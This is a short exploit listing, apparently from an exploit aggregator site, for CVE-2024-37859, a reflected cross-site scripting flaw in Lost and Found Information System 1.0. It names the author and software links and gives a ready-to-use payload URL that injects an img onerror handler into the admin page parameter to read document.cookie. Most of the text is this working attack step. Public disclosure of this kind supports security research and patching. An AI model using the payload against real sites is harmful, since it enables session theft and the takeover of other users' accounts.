Exploit for Lost And Found Information System 1.0 Cross Site Scripting CVE-2024-37859

Name: Exploit for Lost And Found Information System 1.0 Cross Site Scripting CVE-2024-37859
Rating: 5 (147 reviews)

2024-06-13 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:179081
# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System   
# Exploit Author: Amit Roy (Rezur / AR0x7)  
# Date: June 07, 2024  
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip  
# Tested on: Kali Linux, Apache, Mysql  
# Version: v1.0  
# Exploit Description:  
# Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users  
# CVE : CVE-2024-37859  
  
1) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>